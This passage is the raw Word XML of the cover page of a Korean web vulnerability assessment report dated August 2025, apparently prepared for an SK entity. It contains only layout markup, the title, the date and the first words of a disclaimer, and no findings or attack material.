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73DB2" w14:textId="77777777" w:rsidR="005D30D0" w:rsidRDefault="005D30D0" w:rsidP="003324FA">
      <w:pPr>
        <w:wordWrap/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D3B2A7F" w14:textId="16A9AEFD" w:rsidR="007649DC" w:rsidRDefault="007649DC" w:rsidP="003324FA">
      <w:pPr>
        <w:wordWrap/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06AAEFB6" w14:textId="77777777" w:rsidR="000E6CD9" w:rsidRPr="00DD7C29" w:rsidRDefault="000E6CD9" w:rsidP="003324FA">
      <w:pPr>
        <w:wordWrap/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33C00DC1" w14:textId="5C5E2208" w:rsidR="00F562BF" w:rsidRDefault="000E6CD9" w:rsidP="003324FA">
      <w:pPr>
        <w:wordWrap/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00453BAB">
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="60"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7CE618E7" wp14:editId="22565EF7">
            <wp:extent cx="1896745" cy="1261745"/>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6745" cy="1261745"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DC7D3A" w14:textId="77777777" w:rsidR="00F562BF" w:rsidRPr="00380149" w:rsidRDefault="00F562BF" w:rsidP="003324FA">
      <w:pPr>
        <w:wordWrap/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5166DAF7" w14:textId="77777777" w:rsidR="005D30D0" w:rsidRDefault="00D95078" w:rsidP="003324FA">
      <w:pPr>
        <w:wordWrap/>
      </w:pPr>
      <w:r w:rsidRPr="00596F66">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661824" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="689D883C" wp14:editId="084CEEFC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>500380</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>449036</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5509260" cy="696685"/>
                <wp:effectExtent l="0" t="0" r="0" b="8255"/>
                <wp:wrapNone/>
                <wp:docPr id="1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260" cy="696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14:paraId="35FE2837" w14:textId="6939A1C6" w:rsidR="00AD774D" w:rsidRPr="002919F7" w:rsidRDefault="000E6CD9" w:rsidP="00F562BF">
                            <w:pPr>
                              <w:pStyle w:val="a3"/>
                              <w:snapToGrid/>
                              <w:ind w:left="1" w:firstLineChars="150" w:firstLine="720"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                                <w:b/>
                                <w:bCs/>
                                <w:sz w:val="48"/>
                                <w:szCs w:val="56"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                                <w:b/>
                                <w:bCs/>
                                <w:sz w:val="48"/>
                                <w:szCs w:val="56"/>
                              </w:rPr>
                              <w:t>WEB</w:t>
                            </w:r>
                            <w:r w:rsidR="004529F9">
                              <w:rPr>
                                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                                <w:b/>
                                <w:bCs/>
                                <w:sz w:val="48"/>
                                <w:szCs w:val="56"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r w:rsidR="00802A7F">
                              <w:rPr>
                                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
                                <w:b/>
                                <w:bCs/>
                                <w:sz w:val="48"/>
                                <w:szCs w:val="56"/>
                              </w:rPr>
                              <w:t>취약점진단</w:t>
                            </w:r>
                            <w:r w:rsidR="00AD774D">
                              <w:rPr>
                                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
                                <w:b/>
                                <w:bCs/>
                                <w:sz w:val="48"/>
                                <w:szCs w:val="56"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> </w:t>
                            </w:r>
                            <w:r w:rsidR="00AD774D" w:rsidRPr="002919F7">
                              <w:rPr>
                                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
                                <w:b/>
                                <w:bCs/>
                                <w:sz w:val="48"/>
                                <w:szCs w:val="56"/>
                              </w:rPr>
                              <w:t>결과보고서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883C" id="Rectangle 607" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:39.4pt;margin-top:35.35pt;width:433.8pt;height:54.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4I9QEAAM4DAAAOAAAAZHJzL2Uyb0RvYy54bWysU8Fu2zAMvQ/YPwi6L3aCxG2MOEXRosOA&#10;bivW7QMUWbaF2aJGKbGzrx8lO1m63opdBFGknt57pDY3Q9eyg0KnwRR8Pks5U0ZCqU1d8B/fHz5c&#10;c+a8MKVowaiCH5XjN9v37za9zdUCGmhLhYxAjMt7W/DGe5sniZON6oSbgVWGkhVgJzyFWCclip7Q&#10;uzZZpGmW9IClRZDKOTq9H5N8G/GrSkn/taqc8qwtOHHzccW47sKabDcir1HYRsuJhngDi05oQ4+e&#10;oe6FF2yP+hVUpyWCg8rPJHQJVJWWKmogNfP0HzXPjbAqaiFznD3b5P4frPxyeEKmS+rdkjMjOurR&#10;N3JNmLpVLEuvgkO9dTkVPtsnDBqdfQT50zEDdw3VqVtE6BslSuI1D/XJiwshcHSV7frPUBK+2HuI&#10;Zg0VdgGQbGBD7Mnx3BM1eCbpcLVK14uMWicpl62z7HoVnxD56bZF5z8q6FjYFByJfUQXh0fnAxuR&#10;n0rCYwYedNvGvrfmxQEVjicqDs50+0R/tMEPu2FyZAflkVQhjENFn4A2DeBvznoaqIK7X3uBirP2&#10;kyFn1vPlMkxgDJarqwUFeJnZXWaEkQRVcM/ZuL3z49TuLeq6oZfmUaSBW3Kz0lFooDqymnpAQxP1&#10;TwMepvIyjlV/v+H2DwAAAP//AwBQSwMEFAAGAAgAAAAhAIEp0i3fAAAACQEAAA8AAABkcnMvZG93&#10;bnJldi54bWxMj8FOwzAQRO9I/IO1SNyoDY2aNI1TVUiIAxcSEOLoxiYOjddR7Lbm71lO9DRazWjm&#10;bbVNbmQnM4fBo4T7hQBmsPN6wF7C+9vTXQEsRIVajR6NhB8TYFtfX1Wq1P6MjTm1sWdUgqFUEmyM&#10;U8l56KxxKiz8ZJC8Lz87Femce65ndaZyN/IHIVbcqQFpwarJPFrTHdqjk/Cx/F7uYnN4eX5NTd67&#10;T5vaqZHy9ibtNsCiSfE/DH/4hA41Me39EXVgo4S8IPJIKnJg5K+zVQZsT8FCZMDril9+UP8CAAD/&#10;/wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50&#10;X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAA&#10;X3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEApYyOCPUBAADOAwAADgAAAAAAAAAAAAAAAAAuAgAA&#10;ZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAgSnSLd8AAAAJAQAADwAAAAAAAAAAAAAAAABP&#10;BAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAFsFAAAAAA==&#10;" filled="f" stroked="f" strokecolor="red" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="35FE2837" w14:textId="6939A1C6" w:rsidR="00AD774D" w:rsidRPr="002919F7" w:rsidRDefault="000E6CD9" w:rsidP="00F562BF">
                      <w:pPr>
                        <w:pStyle w:val="a3"/>
                        <w:snapToGrid/>
                        <w:ind w:left="1" w:firstLineChars="150" w:firstLine="720"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                          <w:b/>
                          <w:bCs/>
                          <w:sz w:val="48"/>
                          <w:szCs w:val="56"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                          <w:b/>
                          <w:bCs/>
                          <w:sz w:val="48"/>
                          <w:szCs w:val="56"/>
                        </w:rPr>
                        <w:t>WEB</w:t>
                      </w:r>
                      <w:r w:rsidR="004529F9">
                        <w:rPr>
                          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                          <w:b/>
                          <w:bCs/>
                          <w:sz w:val="48"/>
                          <w:szCs w:val="56"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidR="00802A7F">
                        <w:rPr>
                          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
                          <w:b/>
                          <w:bCs/>
                          <w:sz w:val="48"/>
                          <w:szCs w:val="56"/>
                        </w:rPr>
                        <w:t>취약점진단</w:t>
                      </w:r>
                      <w:r w:rsidR="00AD774D">
                        <w:rPr>
                          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
                          <w:b/>
                          <w:bCs/>
                          <w:sz w:val="48"/>
                          <w:szCs w:val="56"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r w:rsidR="00AD774D" w:rsidRPr="002919F7">
                        <w:rPr>
                          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕" w:hint="eastAsia"/>
                          <w:b/>
                          <w:bCs/>
                          <w:sz w:val="48"/>
                          <w:szCs w:val="56"/>
                        </w:rPr>
                        <w:t>결과보고서</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00F562BF" w:rsidRPr="00596F66">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659776" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1ED8BF8B" wp14:editId="0A78FF89">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-594360</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>432435</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6934835" cy="1590675"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:wrapTight wrapText="bothSides">
              <wp:wrapPolygon edited="0">
                <wp:start x="0" y="0"/>
                <wp:lineTo x="0" y="21471"/>
                <wp:lineTo x="21539" y="21471"/>
                <wp:lineTo x="21539" y="0"/>
                <wp:lineTo x="0" y="0"/>
              </wp:wrapPolygon>
            </wp:wrapTight>
            <wp:docPr id="6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 cstate="email">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="1198" r="2577"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="69348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B21B3" w14:textId="77777777" w:rsidR="005D30D0" w:rsidRDefault="005D30D0" w:rsidP="003324FA">
      <w:pPr>
        <w:wordWrap/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6478C66A" w14:textId="77777777" w:rsidR="005D30D0" w:rsidRDefault="005D30D0" w:rsidP="003324FA">
      <w:pPr>
        <w:wordWrap/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0860AA0D" w14:textId="77777777" w:rsidR="005D30D0" w:rsidRDefault="005D30D0" w:rsidP="003324FA">
      <w:pPr>
        <w:wordWrap/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F686A85" w14:textId="77777777" w:rsidR="00F562BF" w:rsidRDefault="00F562BF" w:rsidP="003324FA">
      <w:pPr>
        <w:wordWrap/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63CB5A30" w14:textId="77777777" w:rsidR="007566AC" w:rsidRDefault="007566AC" w:rsidP="003324FA">
      <w:pPr>
        <w:wordWrap/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E6D85C4" w14:textId="77777777" w:rsidR="000E6CD9" w:rsidRDefault="000E6CD9" w:rsidP="003324FA">
      <w:pPr>
        <w:wordWrap/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10E8B2C2" w14:textId="77777777" w:rsidR="007566AC" w:rsidRDefault="007566AC" w:rsidP="003324FA">
      <w:pPr>
        <w:wordWrap/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A1E63AA" w14:textId="36E21E2C" w:rsidR="005D30D0" w:rsidRPr="00104D75" w:rsidRDefault="005D30D0" w:rsidP="003324FA">
      <w:pPr>
        <w:pStyle w:val="af0"/>
        <w:wordWrap/>
      </w:pPr>
      <w:r w:rsidRPr="00104D75">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>20</w:t>
      </w:r>
      <w:r w:rsidR="00D95078">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="000E6CD9">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00104D75">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0016533F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00104D75">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00F22678">
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00104D75">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0016533F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F22678">
        <w:t>25</w:t>
      </w:r>
      <w:r w:rsidR="0016533F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE24A87" w14:textId="77777777" w:rsidR="005D30D0" w:rsidRDefault="005D30D0" w:rsidP="003324FA">
      <w:pPr>
        <w:wordWrap/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2651C163" w14:textId="3AB181F3" w:rsidR="0016533F" w:rsidRDefault="0016533F" w:rsidP="003324FA">
      <w:pPr>
        <w:wordWrap/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46D327A3" w14:textId="77777777" w:rsidR="000E6CD9" w:rsidRDefault="000E6CD9" w:rsidP="003324FA">
      <w:pPr>
        <w:wordWrap/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2974AA1D" w14:textId="77777777" w:rsidR="00F562BF" w:rsidRPr="00DD7C29" w:rsidRDefault="0016533F" w:rsidP="0016533F">
      <w:pPr>
        <w:wordWrap/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00380149">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33AE69AD" wp14:editId="5EEFD0E8">
            <wp:extent cx="1037707" cy="4895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37707" cy="489585"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAEE862" w14:textId="77777777" w:rsidR="005D30D0" w:rsidRPr="00380149" w:rsidRDefault="005D30D0" w:rsidP="0029697E">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0015ED3E" w14:textId="77777777" w:rsidR="005D30D0" w:rsidRPr="00DD7C29" w:rsidRDefault="005D30D0" w:rsidP="003324FA">
      <w:pPr>
        <w:wordWrap/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="643B1DE4" w14:textId="77777777" w:rsidR="005D30D0" w:rsidRDefault="005D30D0" w:rsidP="003324FA">
      <w:pPr>
        <w:wordWrap/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AF6A0C6" w14:textId="77777777" w:rsidR="001113E3" w:rsidRDefault="001113E3" w:rsidP="003324FA">
      <w:pPr>
        <w:wordWrap/>
        <w:sectPr w:rsidR="001113E3" w:rsidSect="0042161F">
          <w:headerReference w:type="default" r:id="rId12"/>
          <w:headerReference w:type="first" r:id="rId13"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1882" w:right="1440" w:bottom="1440" w:left="1440" w:header="851" w:footer="992"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425"/>
          <w:titlePg/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7282B773" w14:textId="77777777" w:rsidR="005D30D0" w:rsidRDefault="005D30D0" w:rsidP="003324FA">
      <w:pPr>
        <w:wordWrap/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BC4A9B8"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64DAB5DA" wp14:editId="312E3F94">
                <wp:extent cx="4189730" cy="627380"/>
                <wp:effectExtent l="0" t="0" r="20320" b="20320"/>
                <wp:docPr id="2" name="모서리가 둥근 직사각형 2"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4189730" cy="627380"/>
                        </a:xfrm>
                        <a:prstGeom prst="roundRect">
                          <a:avLst>
                            <a:gd name="adj" fmla="val 19139"/>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DAB5DA" id="모서리가 둥근 직사각형 2" o:spid="_x0000_s1027" style="width:329.9pt;height:49.4pt;visibility:visible;mso-wrap-style:square;mso-left-percent:-10001;mso-top-percent:-10001;mso-position-horizontal:absolute;mso-position-horizontal-relative:char;mso-position-vertical:absolute;mso-position-vertical-relative:line;mso-left-percent:-10001;mso-top-percent:-10001;v-text-anchor:middle" arcsize="1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Z5wIAAPIFAAAOAAAAZHJzL2Uyb0RvYy54bWysVL1uFDEQ7pF4B8s92bsLhOSUveiUKAgp&#10;JFESlNrnte8W2R5j+35CRRAvQIFEQcuPEAUdDU+UhHdg7P25BCIKRLM7Hs98M/PNeDa3FlqRmXC+&#10;BJPT7kqHEmE4FKUZ5/Tpye69dUp8YKZgCozI6ZnwdGtw987m3PZFDyagCuEIghjfn9ucTkKw/Szz&#10;fCI08ytghcFLCU6zgEc3zgrH5oiuVdbrdNayObjCOuDCe9TuVJd0kPClFDwcSOlFICqnmFtIX5e+&#10;o/jNBpusP3bMTkpep8H+IQvNSoNBW6gdFhiZuvIPKF1yBx5kWOGgM5Cy5CLVgNV0O79VczxhVqRa&#10;kBxvW5r8/4Pl+7NDR8oipz1KDNPYossvn69ev7/8+PXi20ty+ebDxfcf5OrT+dUrVJz/fPeW9CJr&#10;c+v76HxsD1198ihGChbS6fjH4sgiMX3WMi0WgXBU3u+ubzxcxYZwvFvrPVxdT63Ilt7W+fBIgCZR&#10;yKmDqSmOsJ2JZTbb8yHRXdRJs+IZJVIrbN6MKdLd6K5uxDQRsTZGqcGMngZ2S6VS+5WJCg+qLKIu&#10;HeL8iW3lCKLldDTuprhqqp9AUenWHnQ6TdJpXKN5CngNCYNG9CyyVfGTpHCmRAyjzJGQyD4y0ksB&#10;WqAqBuNcmFDF9hNWiEodI98eOgFGZImFtNg1wM2aGuyKpNo+uor0bFrnzt8Sq5xbjxQZTGiddWnA&#10;3QagsKo6cmXfkFRRE1kKi9EiTWayjJoRFGc4rQ6qZ+wt3y1xOvaYD4fMYetxoHAXhQP8SAXznEIt&#10;UTIB9+I2fbTH54S3lMxxD+TUP58yJyhRjw0+tLg0GsE1wqgRzFRvAw5IF7ec5UlEBxdUI0oH+hRX&#10;1DBGwStmOMbKKQ+uOWyHah/hkuNiOExmuBwsC3vm2PIIHnmNw3uyOGXO1k8i4GPah2ZH1HNecbq0&#10;jZ4GhtMAsgzxcsljfcDFgtKNzXX9nKyWq3rwCwAA//8DAFBLAwQUAAYACAAAACEASjtas9wAAAAE&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbEyPQUvDQBCF74L/YRnBm920YEhjNiUoHqQnU4X2ts2Om7TZ&#10;2ZDdtvHfO3qxlwfDG977XrGaXC/OOIbOk4L5LAGB1HjTkVXwsXl9yECEqMno3hMq+MYAq/L2ptC5&#10;8Rd6x3MdreAQCrlW0MY45FKGpkWnw8wPSOx9+dHpyOdopRn1hcNdLxdJkkqnO+KGVg/43GJzrE9O&#10;wWL3srPzutuO2/X6UH0O1eYttUrd303VE4iIU/x/hl98RoeSmfb+RCaIXgEPiX/KXvq45Bl7Bcss&#10;A1kW8hq+/AEAAP//AwBQSwECLQAUAAYACAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAA&#10;AAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAA&#10;AAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDnWAUZ5wIAAPIFAAAOAAAAAAAA&#10;AAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQBKO1qz3AAAAAQBAAAPAAAA&#10;AAAAAAAAAAAAAEEFAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAASgYAAAAA&#10;" filled="f" strokecolor="#a5a5a5 [2092]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:textbox inset="0,0,0,0">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v:textbox>
                <w10:anchorlock/>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AFC3E5" w14:textId="77777777" w:rsidR="005D30D0" w:rsidRDefault="005D30D0" w:rsidP="003324FA">
      <w:pPr>
        <w:wordWrap/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BFB100C"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74011BA3" wp14:editId="5649EECD">
                <wp:extent cx="5998029" cy="2405743"/>
                <wp:effectExtent l="0" t="0" r="22225" b="13970"/>
                <wp:docPr id="395" name="Text Box 395"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5998029" cy="24057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20F086AD" w:rsidR="00AD774D" w:rsidRDefault="00AD774D" w:rsidP="0033280A">
                            <w:pPr>
                              <w:jc w:val="left"/>
                            </w:pPr>
                            <w:r w:rsidRPr="00580F71">
                              <w:rPr>
                                <w:rFonts w:hint="eastAsia"/>
                              </w:rPr>
                              <w:t xml:space="preserve">본 보고서는 </w:t>
                            </w:r>
                            <w:r>
                              <w:t>SK</w:t>
                            </w:r>
                            <w:r w:rsidR="000E6CD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wps:txbx>
                      <wps:bodyPr rot="0" spcFirstLastPara="0" vertOverflow="overflow" horzOverflow="overflow" vert="horz" wrap="square" lIns="46800" tIns="45720" rIns="91440" bIns="45720" numCol="1" spcCol="0" rtlCol="0" fromWordArt="0" anchor="ctr" anchorCtr="0" forceAA="0" compatLnSpc="1">
                        <a:prstTxWarp prst="textNoShape">
                          <a:avLst/>
                        </a:prstTxWarp>
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shapetype w14:anchorId="74011BA3" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
                <v:stroke joinstyle="miter"/>
                <v:path gradientshapeok="t" o:connecttype="rect"/>
              </v:shapetype>
              <v:shape id="Text Box 395" o:spid="_x0000_s1028" type="#_x0000_t202" style="width:472.3pt;height:18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lxoAIAAMAFAAAOAAAAZHJzL2Uyb0RvYy54bWysVN9P2zAQfp+0/8Hy+0haWmirpqgDMU1C&#10;gAYTz65jUwvH59luk+6v39lJSst4YdpL4vN9d7777sf8oqk02QrnFZiCDk5ySoThUCrzXNCfj9df&#10;JpT4wEzJNBhR0J3w9GLx+dO8tjMxhDXoUjiCToyf1bag6xDsLMs8X4uK+ROwwqBSgqtYQNE9Z6Vj&#10;NXqvdDbM87OsBldaB1x4j7dXrZIukn8pBQ93UnoRiC4oxhbS16XvKn6zxZzNnh2za8W7MNg/RFEx&#10;ZfDRvasrFhjZOPWXq0pxBx5kOOFQZSCl4iLlgNkM8jfZPKyZFSkXJMfbPU3+/7nlt9t7R1RZ0NPp&#10;mBLDKizSo2gC+QoNiXfIUG39DIEPFqGhQQVWur/3eBkTb6Sr4h9TIqhHrnd7fqM7jpfj6XSSD6eU&#10;cNQNR/n4fHQa/WSv5tb58E1AReKhoA4LmHhl2xsfWmgPia950Kq8VlonITaNuNSObBmWW4cUJDo/&#10;QmlD6oKenY7z5PhIF13v7Vea8ZcuvAMU+tMmPidSe3VhRYpaKtIp7LSIGG1+CIn0JkbeiZFxLsw+&#10;zoSOKIkZfcSww79G9RHjNg+0SC+DCXvjShlwLUvH1JYvPbWyxWMND/KOx9CsmtRXw75TVlDusIEc&#10;tEPoLb9WyPcN8+GeOZw67BncJOEOP1IDFgm6EyVrcL/fu494HAbUUlLjFBfU/9owJyjR3w2Oyehs&#10;ksexb4Xx+RAFl4TpYDRCYXWoMZvqErBzBrizLE/HiA+6P0oH1RMunGV8FVXMcHy7oDy4XrgM7XbB&#10;lcXFcplgOOqWhRvzYHl0HnmOnfbYPDFnu04POCS30E88m71p+BYbLQ0sNwGkStMQmW557SqAayLN&#10;U7fS4h46lBPqdfEu/gAAAP//AwBQSwMEFAAGAAgAAAAhAInJrTbcAAAABQEAAA8AAABkcnMvZG93&#10;bnJldi54bWxMj8FOwzAQRO9I/IO1SFwQdYAS2hCnQiCulVoQUm/beIkj4nWwnSb9e0wvcFlpNKOZ&#10;t+Vqsp04kA+tYwU3swwEce10y42C97fX6wWIEJE1do5JwZECrKrzsxIL7Ube0GEbG5FKOBSowMTY&#10;F1KG2pDFMHM9cfI+nbcYk/SN1B7HVG47eZtlubTYclow2NOzofprO1gFw7fPzW68Oq6nD/eCm2a9&#10;6+8HpS4vpqdHEJGm+BeGX/yEDlVi2ruBdRCdgvRIPN3kLefzHMRewd3DYgmyKuV/+uoHAAD//wMA&#10;UEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5&#10;cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3Jl&#10;bHMvLnJlbHNQSwECLQAUAAYACAAAACEA8XnJcaACAADABQAADgAAAAAAAAAAAAAAAAAuAgAAZHJz&#10;L2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAicmtNtwAAAAFAQAADwAAAAAAAAAAAAAAAAD6BAAA&#10;ZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAAMGAAAAAA==&#10;" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox inset="1.3mm">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20F086AD" w:rsidR="00AD774D" w:rsidRDefault="00AD774D" w:rsidP="0033280A">
                      <w:pPr>
                        <w:jc w:val="left"/>
                      </w:pPr>
                      <w:r w:rsidRPr="00580F71">
                        <w:rPr>
                          <w:rFonts w:hint="eastAsia"/>
                        </w:rPr>
                        <w:t xml:space="preserve">본 보고서는 </w:t>
                      </w:r>
                      <w:r>
                        <w:t>SK</w:t>
